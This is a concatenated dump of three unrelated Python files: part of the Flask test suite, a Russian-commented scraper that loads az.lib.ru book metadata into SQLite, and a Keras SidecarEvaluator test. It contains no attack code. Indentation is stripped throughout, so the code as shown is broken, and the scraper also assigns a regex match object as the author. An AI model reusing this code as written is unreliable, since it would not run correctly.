assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
@pytest.mark.filterwarnings("ignore::pytest.PytestUnhandledThreadExceptionWarning")
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
AssertionError()
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
AssertionError()
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route("/киртест")
def index():
return "Hello World!"
rv = client.get("/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e.value)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e.value)
assert "Make sure to directly send your POST-request to this URL" in str(
e.value
)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for _x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# suppress Werkzeug 0.15 warning about name mismatch
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore", "Current server name", UserWarning, "flask.app"
)
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
assert rv.status_code == 404 if matching else 204
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
assert rv.status_code == 404 if matching else 204
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View:
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = f"running on {hostname}:{port} ..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == f"running on {hostname}:{port} ..."
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(
monkeypatch, host, port, server_name, expect_host, expect_port, app
):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
@require_cpython_gc
def test_app_freed_on_zero_refcount():
# A Flask instance should not create a reference cycle that prevents CPython
# from freeing it when all external references to it are released (see #3761).
gc.disable()
try:
app = flask.Flask(__name__)
assert app.view_functions["static"]
weak = weakref.ref(app)
assert weak() is not None
del app
assert weak() is None
finally:
gc.enable()
|
parse_works_metadata_from_htmls_to_db.py
|
#!/usr/bin/env python3
from urllib.parse import urlsplit, parse_qs, parse_qsl, unquote, quote, urljoin, urlencode, quote_plus
import json
import time
import sqlite3
import sqlalchemy.exc
import os
import threading, queue
from pathlib import Path
from typing import Optional, Union
from dataclasses import dataclass
import re
import parsel
from bs4 import BeautifulSoup, Comment, NavigableString, Tag
import html as html_
import db
lock = threading.RLock()
q = queue.Queue(maxsize=20) # fifo_queue
db_q = queue.Queue(maxsize=20)
categories_cached = [(r['id'], r['slug'], r['name']) for r in db.texts_categories_names.find()]
@dataclass
class D:
"""
from collections import namedtuple
d = namedtuple('D', 'author title date translator source other text categories')
"""
tid: int
author: str = None
translator: str = None
categories = []
year = None
desc = None
author_tag = None
year_tag = None
annotation_tag = None
class Parse_metadata_from_html:
def get_desc_block(self, soup):
for t in soup.find_all('table'):
for e in t.find_all(
text=lambda x: isinstance(x, Comment) and 'Блок описания произведения (слева вверху)' in x):
return t
def get_li_block(self, desc_block) -> Optional[tuple]:
# for ul in desc_block.find_all('ul'):
# for _ in ul.find_all(text=lambda x: isinstance(x, NavigableString) and 'Оставить комментарий' in x):
ul = desc_block.find_all('ul')[0]
li = ul.find_all('li')
return li
def get_annotation_block(self, desc_block):
for e in desc_block.find_all(text=lambda x: isinstance(x, NavigableString) and 'Аннотация:' in x):
li = e.find_parent('li')
z = e
if e.parent.name == 'font':
z = e.parent
if e.parent.parent.name == 'b':
z = e.parent.parent
z.extract()
li.find('i').unwrap()
return li
def parse_year(self, year_line):
for y in year_line.find_all(text=lambda x: isinstance(x, NavigableString) and 'Год:' in x):
self.d.year = y.text.split('Год:')[1].strip()
break
def parse_annotation(self, annotation_):
# todo
if annotation_ and annotation_.text.strip() != '':
# self.d.desc = annotation_.text # удаляет теги, заменяет <br> на \n
if m := re.search(r'<li>(\s|<br[\s/]*>|\.)*(.*?)(\s|<br[\s/]*>)*</li>', str(annotation_), flags=re.DOTALL):
t = m.group(2)
if not re.search(r'^[.,?!]]*$', t): # исключаем пустое значение
self.d.desc = t
# self.d.year=str(annotation_)
def parse_categories(self, categories_line):
if x := categories_line.find('a'):
if x.attrs.get('href', '').startswith("/type/"):
self.d.categories = [(a.attrs.get('href'), a.text) for a in categories_line.find_all('a')
if a.attrs.get('href').startswith("/")]
for e in categories_line.find_all('font', attrs={'size': '-1'}):
e.unwrap()
def parse_author(self, author_line):
r = self.r
"""<li><a href="http://az.lib.ru/d/defo_d/">Дефо Даниель</a>
(перевод: Я . . . . въ Л . . . . .нъ)
(<u>yes@lib.ru</u>)
</li>"""
author_line_s = re.sub(r'\(?[\w.]+@\w+\.ru\)?', '', author_line.text)
# if email := author_line.find(text=lambda x: isinstance(x, NavigableString) and '@lib.ru' in x):
# email.extract()
for a in author_line.find_all('a'):
if r['name'].replace('_', ' ') == r['litarea']:
if a.text.strip() not in ([r['litarea'], r['name']]):
self.d.author = a.text.strip()
break
elif href := a.attrs.get('href'):
if urlsplit(href).path.rstrip('/') == r['author_slug']:
self.d.author = r['name_for_WS']
break
else:
print('href != author_slug')
else:
print('нет <a> в строке автора')
if author_ := re.search(r'(.+?)\s*\(перевод:\s*(.+?)\s*\)', author_line_s):
self.d.author = author_
else:
raise RuntimeError('tid:', self.r['tid'], 'автор не распарсен')
# if translator := re.search(r'\(перевод:\s*(.+?)\s*\)', author_line_s):
# d.translator = translator.group(1)
# if email := author_line.find(text=lambda x: isinstance(x, NavigableString) and '@lib.ru' in x):
# email.extract()
def parse_translator(self, annotation_, author_line):
r = self.r
"""Перевод <a href="http://az.lib.ru/z/zhurawskaja_z_n/">Зинаиды Журавской</a>"""
# for s in annotation_.descendants:
# if isinstance(s, NavigableString) and 'Перевод ' in s \
# and isinstance(s.next_element, Tag) and s.next_sibling.name == 'a':
# a = s.next_sibling
# if translator := re.search(r'(.+?)\s*\(Перевод \s*(.+?)\s*\)', annotation_):
# d.translator = translator.group(1)
if annotation_:
for e in annotation_.find_all('i'):
for s in e.contents:
if isinstance(s, NavigableString) and 'Перевод ' in s:
if isinstance(s.next_element, Tag) and s.next_element.name == 'a':
a_ = s.next_element
href = a_.attrs.get('href')
if href and a_.attrs.get('href') != '':
if r := db.all_tables.find_one(
author_slug=urlsplit(href.strip()).path.replace('/editors', '').rstrip('/')):
self.d.translator = r['name_for_WS']
break
else:
pass
a_.unwrap()
if self.d.translator is None:
# http://az.lib.ru/d/degen_e_w/
# raise RuntimeError('tid:', self.r['tid'], 'не определён переводчик в <a>')
print('tid:', self.r['tid'], 'не определён переводчик в <a>')
self.d.translator = e.text
e.extract()
# elif translator_ := re.search(r'Перевод (.+)', s):
# self.d.translator = translator_.group(1)
# s.extract()
# else:
# raise RuntimeError('tid:', self.r['tid'], 'не определён переводчик')
else:
self.d.translator = s
s.extract()
if e.contents == []:
e.extract()
if self.d.translator is None:
if translator_ := re.search(r'\(перевод:\s*(.+?)\s*\)', author_line.text):
self.d.translator = translator_.group(1)
else:
# print('нет <a> в строке автора')
pass
is_cat_transl = [True for slug, name in self.d.categories if name == 'Переводы']
if is_cat_transl and self.d.translator is None:
# raise RuntimeError('tid:', self.r['tid'], 'не определён переводчик')
print('tid:', self.r['tid'], 'не определён переводчик', r['text_url'])
elif not is_cat_transl and self.d.translator:
# raise RuntimeError('tid:', self.r['tid'], 'переводчик без категории перевода')
print('tid:', self.r['tid'], 'переводчик без категории перевода', r['text_url'])
def parse(self, r):
self.r = r
self.d = D(tid=r['tid'])
soup = BeautifulSoup(r['html'], 'html5lib')
desc_block = self.get_desc_block(soup)
annotation_ = self.get_annotation_block(desc_block)
li = self.get_li_block(desc_block)
if len(li) not in [5, 6]:
# raise RuntimeError('tid:', self.r['tid'], 'длинна <li> описания не равна 6')
print('tid:', self.d.tid, 'длинна <li> описания не равна 5-6')
return
else:
author_line, year_line, categories_line = li[1], li[2], li[4]
for store, tag in zip(('author_tag', 'year_tag', 'annotation_tag'), (author_line, year_line, annotation_)):
if tag:
t = re.search(r'<li>(\s|<br[\s/]*>)*(.*?)(\s|<br[\s/]*>)*</li>', str(tag), flags=re.DOTALL)
if t.group(2) != '':
self.d.__setattr__(store, t.group(2))
self.parse_categories(categories_line)
self.parse_author(author_line)
self.parse_translator(annotation_, author_line)
self.parse_year(year_line)
self.parse_annotation(annotation_)
return self.d
tids = []
def add_categories(d, categories_cached):
tid = d.tid
if tid in tids:
raise RuntimeError('tid:', tid, 'tid уже обрабатывался, дублирование в threads')
# print('ой', tid)
else:
tids.append(tid)
categories_to_add = []
for slug_d, name_d in d.categories:
for cid, slug, name in categories_cached:
if slug == slug_d:
break
else:
# print('to db insert', d.tid)
db.texts_categories_names.insert({'slug': slug_d, 'name': name_d}, ensure=True)
# print('to db find_one', d.tid)
cid = db.texts_categories_names.find_one(slug=slug_d)['id']
categories_cached.append([cid, slug_d, name_d])
categories_to_add.append({'tid': tid, 'category_id': cid})
try:
# print('to db insert_many', d.tid)
db.texts_categories.insert_many(categories_to_add, ensure=True)
except sqlalchemy.exc.IntegrityError:
# print('to db delete', d.tid)
db.texts_categories.delete(tid=tid)
# print('to db insert_many', d.tid)
db.texts_categories.insert_many(categories_to_add, ensure=True)
def parse_metadata_from_html_parsel(tid, html):
"""
# todo
"""
d = D()
dom = parsel.Selector(html)
desc_block = dom.xpath(
'//table//comment()[contains(.,"Блок описания произведения (слева вверху")]/ancestor::table')
info_li = desc_block.xpath('.//li/a[contains(.,"Оставить комментарий")]/ancestor::ul//li')
if len(info_li) != 6:
print('tid:', tid, 'длинна <li> описания не равна 6')
return
author_ = info_li[1]
year_ = info_li[2]
categories_ = info_li[3]
annotation_ul = desc_block.xpath('./a[contains(.,"Аннотация:")]/ancestor::ul')
categories_ = desc_block.xpath('.//a[starts-with(@href,"/type/")]/ancestor::li//a').css('a[href^="/"]')
categories = [(z.css('::attr(href)').get(), z.css('::text').get()) for z in categories_]
return d
def main():
# from collections import namedtuple
# Cat = namedtuple('Cat', '')
# for r in db.all_tables.find(db.all_tables.table.c.wiki_page.isnot(None)):
# for r in db.all_tables.find(wiki=None):
# r = db.all_tables.find_one(tid=7487)
# tid = 7488 # http://az.lib.ru/d/defo_d/text_0014.shtml В аннотации <i>Перевод <a href="http://az.lib.ru/z/zhurawskaja_z_n/">Зинаиды Журавской</a></i>
tid = 7487 # http://az.lib.ru/d/defo_d/text_0013_robinson_crusoe-oldorfo.shtml В строк автор "Дефо Даниель (перевод: Я . . . . въ Л . . . . .нъ)"
# tid = 7
def db_save():
while True:
while db_q.empty():
time.sleep(1)
d = db_q.get()
print('to db', d.tid)
with lock:
add_categories(d, categories_cached)
db.htmls.update(
{'tid': d.tid, 'author': d.author, 'translator': d.translator, 'year': d.year, 'desc': d.desc,
'author_tag': d.author_tag, 'year_tag': d.year_tag, 'annotation_tag': d.annotation_tag},
['tid'], ensure=True)
db_q.task_done()
def worker():
while True:
while q.empty():
time.sleep(1)
r = q.get()
print(r['tid'])
parser = Parse_metadata_from_html()
d = parser.parse(r)
if d:
db_q.put(d)
q.task_done()
threading.Thread(target=db_save, name='db_save', daemon=True).start()
# turn-on the worker thread
for r in range(20):
threading.Thread(target=worker, daemon=True).start()
import dataset
db1 = dataset.connect('sqlite:////home/vladislav/var/db/from_lib_ru.sqlite',
engine_kwargs={'connect_args': {'check_same_thread': False}})
# for tid in [5643]:
# for r in db.db_htmls.find(db.db_htmls.table.c.wiki.isnot(None)):
for r in db1['all_tables'].find(author=None):
# for r in db.all_tables.find(tid =654):
while q.full():
time.sleep(1)
q.put(r)
# block until all tasks are done
q.join()
db_q.join()
print('All work completed')
if __name__ == '__main__':
main()
|
sidecar_evaluator_test.py
|
# Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test covering sidecar_evaluator.py."""
import enum
import os
import threading
import time
from absl.testing import parameterized
import keras
from keras.distribute import sidecar_evaluator as sidecar_evaluator_lib
from keras.optimizer_v2 import gradient_descent
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow.python.platform import tf_logging as logging # pylint: disable=g-direct-tensorflow-import
_BATCH_SIZE = 32
class TestModel(keras.Model):
def __init__(self):
super().__init__(name='test_model')
self.dense = keras.layers.Dense(10)
def call(self, inputs):
return self.dense(inputs)
class DictMetric(keras.metrics.MeanSquaredError):
def result(self):
res = super().result()
return {'mean_squared_error_1': res, 'mean_squared_error_2': res}
class ModelType(enum.Enum):
SEQUENTIAL = 'sequential'
SUBCLASS = 'subclass'
def _test_model_builder(model_type: ModelType, compile_model, build_model):
if model_type == ModelType.SEQUENTIAL:
model = keras.Sequential([keras.layers.Dense(10)])
elif model_type == ModelType.SUBCLASS:
model = TestModel()
if compile_model:
model.compile(
gradient_descent.SGD(),
loss='mse',
metrics=[keras.metrics.CategoricalAccuracy(),
DictMetric()])
if build_model:
model.build((None, 32))
return model
class SidecarEvaluatorTest(tf.test.TestCase, parameterized.TestCase):
def assertSummaryEventsWritten(self, log_dir):
# Asserts summary files do get written when log_dir is provided.
summary_files = tf.io.gfile.listdir(log_dir)
self.assertNotEmpty(
summary_files, 'Summary should have been written and '
'log_dir should not be empty.')
# Asserts the content of the summary file.
event_pb_written = False
event_tags = []
for summary_file in summary_files:
for event_pb in tf.compat.v1.train.summary_iterator(
os.path.join(log_dir, summary_file)):
if event_pb.step > 0:
self.assertEqual(event_pb.step, 32)
event_tags.append(event_pb.summary.value[0].tag)
event_pb_written = True
self.assertCountEqual(event_tags, [
'evaluation_categorical_accuracy_vs_iterations',
'evaluation_loss_vs_iterations',
'evaluation_mean_squared_error_1_vs_iterations',
'evaluation_mean_squared_error_2_vs_iterations',
])
# Verifying at least one non-zeroth step is written to summary.
self.assertTrue(event_pb_written)
def assertModelsSameVariables(self, model_a, model_b):
# Check both have the same number of variables.
self.assertEqual(len(model_a.variables), len(model_b.variables))
# Check variable values to be equal.
for var_a, var_b in zip(model_a.variables, model_b.variables):
self.assertAllEqual(var_a.numpy(), var_b.numpy())
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'], model_type=[ModelType.SEQUENTIAL,
ModelType.SUBCLASS]))
def testIterationsNotSavedWillRaiseError(self, model_type):
model = _test_model_builder(
model_type=model_type, compile_model=False, build_model=True)
checkpoint_dir = self.get_temp_dir()
checkpoint = tf.train.Checkpoint(model=model)
checkpoint_manager = tf.train.CheckpointManager(
checkpoint, checkpoint_dir, max_to_keep=2)
checkpoint_manager.save()
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
model, data=None, checkpoint_dir=checkpoint_dir)
with self.assertRaisesRegex(
RuntimeError, '`iterations` cannot be loaded '
'from the checkpoint file.'):
sidecar_evaluator.start()
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'], model_type=[ModelType.SEQUENTIAL,
ModelType.SUBCLASS]))
def testModelNotBuiltRaiseError(self, model_type):
model = _test_model_builder(
model_type=model_type, compile_model=False, build_model=False)
checkpoint_dir = self.get_temp_dir()
checkpoint = tf.train.Checkpoint(model=model)
checkpoint_manager = tf.train.CheckpointManager(
checkpoint, checkpoint_dir, max_to_keep=2)
checkpoint_manager.save()
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
model, data=None, checkpoint_dir=checkpoint_dir)
with self.assertRaisesRegex(AssertionError, 'Nothing to load.'):
sidecar_evaluator.start()
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'],
model_type=[ModelType.SEQUENTIAL, ModelType.SUBCLASS],
build_model=[True, False]))
def testSidecarEvaluatorOutputsSummary(self, model_type, build_model):
# Create a model with synthetic data, and fit for one epoch.
model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=False)
data = np.random.random((1000, 32))
labels = np.random.random((1000, 10))
dataset = tf.data.Dataset.from_tensor_slices((data, labels))
dataset = dataset.batch(32)
model.fit(dataset, epochs=1)
# Save a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(), 'ckpt')
log_dir = os.path.join(self.get_temp_dir(), 'summary')
logging.info('checkpoint_dir = %s, log_dir = %s', checkpoint_dir, log_dir)
checkpoint = tf.train.Checkpoint(
model=model, optimizer=model.optimizer)
checkpoint_manager = tf.train.CheckpointManager(
checkpoint, checkpoint_dir, max_to_keep=2)
logging.info('Checkpoint manager saved to: %s', checkpoint_manager.save())
self.assertNotEmpty(
tf.io.gfile.listdir(checkpoint_dir),
'Checkpoint should have been written and '
'checkpoint_dir should not be empty.')
# Create a new model used for evaluation.
eval_model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=build_model)
# Have a sidecar_evaluator evaluate once.
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
eval_model,
data=dataset,
checkpoint_dir=checkpoint_dir,
max_evaluations=1,
callbacks=[keras.callbacks.TensorBoard(log_dir=log_dir)])
sidecar_evaluator.start()
# Eval model has been restored to the same state as the original model, so
# their weights should match. If not, restoration of the model didn't
# work.
self.assertModelsSameVariables(model, eval_model)
self.assertSummaryEventsWritten(os.path.join(log_dir, 'validation'))
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'],
model_type=[ModelType.SEQUENTIAL, ModelType.SUBCLASS],
build_model=[True, False]))
def testSidecarEvaluatorOutputsSummarySavedWithCallback(
self, model_type, build_model):
checkpoint_dir = os.path.join(self.get_temp_dir(), 'checkpoints')
log_dir = os.path.join(self.get_temp_dir(), 'summary')
# Create a model with synthetic data, and fit for one epoch.
model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=False)
data = np.random.random((1000, 32))
labels = np.random.random((1000, 10))
dataset = tf.data.Dataset.from_tensor_slices((data, labels))
dataset = dataset.batch(_BATCH_SIZE)
save_callback = keras.callbacks.ModelCheckpoint(
filepath=os.path.join(checkpoint_dir, 'ckpt-{epoch}'),
save_weights_only=True)
model.fit(dataset, epochs=1, callbacks=[save_callback])
self.assertNotEmpty(
tf.io.gfile.listdir(checkpoint_dir),
'Checkpoint should have been written and '
'checkpoint_dir should not be empty.')
# Create a new model used for evaluation.
eval_model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=build_model)
# Have an sidecar_evaluator evaluate once.
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
eval_model,
data=dataset,
checkpoint_dir=checkpoint_dir,
max_evaluations=1,
callbacks=[keras.callbacks.TensorBoard(log_dir=log_dir)])
with self.assertLogs() as cm:
sidecar_evaluator.start()
metrics_logging = [
line for line in cm.output if 'End of evaluation' in line
]
self.assertLen(metrics_logging, 1)
expected_logged_metrics = [
'loss', 'categorical_accuracy', 'mean_squared_error_1',
'mean_squared_error_2'
]
for metric_name in expected_logged_metrics:
self.assertRegex(metrics_logging[0], f'{metric_name}=')
# Eval model has been restored to the same state as the original model, so
# their weights should match. If not, restoration of the model didn't
# work.
self.assertModelsSameVariables(model, eval_model)
# check the iterations is restored.
self.assertEqual(sidecar_evaluator._iterations.numpy(), _BATCH_SIZE)
self.assertSummaryEventsWritten(os.path.join(log_dir, 'validation'))
@tf.__internal__.distribute.combinations.generate(
tf.__internal__.test.combinations.combine(
mode=['eager'],
model_type=[ModelType.SEQUENTIAL, ModelType.SUBCLASS],
build_model=[True, False]))
def testTimeoutFunction(self, model_type, build_model):
checkpoint_dir = os.path.join(self.get_temp_dir(), 'checkpoints')
# Create a model with synthetic data, and fit for one epoch.
data = np.random.random((1000, 32))
labels = np.random.random((1000, 10))
dataset = tf.data.Dataset.from_tensor_slices((data, labels))
dataset = dataset.batch(_BATCH_SIZE)
# Create a new model used for evaluation.
eval_model = _test_model_builder(
model_type=model_type, compile_model=True, build_model=build_model)
# Have an sidecar_evaluator evaluate once.
sidecar_evaluator = sidecar_evaluator_lib.SidecarEvaluator(
eval_model,
data=dataset,
checkpoint_dir=checkpoint_dir,
max_evaluations=1)
with self.assertLogs() as cm:
threading.Thread(target=sidecar_evaluator.start, daemon=True).start()
time.sleep(50)
metrics_logging = [
l for l in cm.output if 'No checkpoints appear to be found' in l
]
self.assertGreaterEqual(len(metrics_logging), 1)
def testExperimentalDeprecatedMessage(self):
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
sidecar_evaluator_lib.SidecarEvaluatorExperimental(None, None, None)
warning_msg = ('`tf.keras.experimental.SidecarEvaluator` '
'endpoint is deprecated')
self.assertIn(warning_msg, '\n'.join(warning_messages))
if __name__ == '__main__':
tf.compat.v1.enable_v2_behavior()
tf.test.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.